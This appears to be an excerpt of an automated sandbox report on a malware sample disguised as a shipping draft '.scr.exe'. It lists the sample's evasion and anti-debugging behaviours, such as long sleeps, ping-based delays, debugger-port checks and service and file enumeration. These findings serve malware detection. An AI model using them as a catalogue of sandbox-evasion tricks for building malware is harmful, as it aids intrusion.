Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794F7A7 Sleep,ExitProcess,

0_2_2794F7A7

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\public\xkn.exe

Key value queried: Powershell behavior

Jump to behavior

Uses ping.exe to sleep

Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\xkn.exe	Memory allocated: 1F43A9C0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\Public\xkn.exe	Memory allocated: 1F43AA10000 memory reserve \| memory write watch			Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 36_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,

36_2_0040DD85

Contains functionality to enumerate running services

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

0_2_2795A748

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Window / User API: threadDelayed 9744	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 1646	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 1786	Jump to behavior

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.exe	API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe	API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Windows \System32\per.exe	API coverage: 7.1 %
Source: C:\Users\Public\alpha.exe	API coverage: 7.9 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.5 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.8 %
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API coverage: 10.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe TID: 7900	Thread sleep time: -714000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe TID: 7900	Thread sleep time: -29232000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif TID: 7348	Thread sleep count: 241 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7712	Thread sleep count: 1646 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7712	Thread sleep count: 1786 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7736	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_401010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_401010F1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27949665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_27949665
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_2794BD37
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_2794BB30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_2794C34D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_2795C291
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27959AF5 FindFirstFileW,	0_2_27959AF5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794880C FindFirstFileW,FindNextFileW,FindClose,	0_2_2794880C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794783C FindFirstFileW,FindNextFileW,	0_2_2794783C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	6_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	6_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	6_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	6_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	9_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	9_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	9_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	9_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	9_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	31_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	31_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	31_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	31_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	31_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	32_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	32_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	32_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	32_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	32_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	34_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	34_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	34_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	34_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	34_2_00007FF70CC97B4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040AE51 FindFirstFileW,FindNextFileW,	36_2_0040AE51
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	37_2_00407EF8

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 36_2_00418981 memset,GetSystemInfo,

36_2_00418981

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp	Jump to behavior

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWv-0006.spov-msedge.netLMEM@
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhv5415.tmp.36.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Glzskrlg.PIF, 00000027.00000002.1856524613.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Glzskrlg.PIF, 0000002A.00000002.1933047287.0000000000776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bhv5415.tmp.36.dr	Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node

Source: C:\Users\Public\xkn.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_028BD920 CheckRemoteDebuggerPresent,

0_2_028BD920

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugFlags
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugFlags

Contains functionality to check if a debugger is running (IsDebuggerPresent)

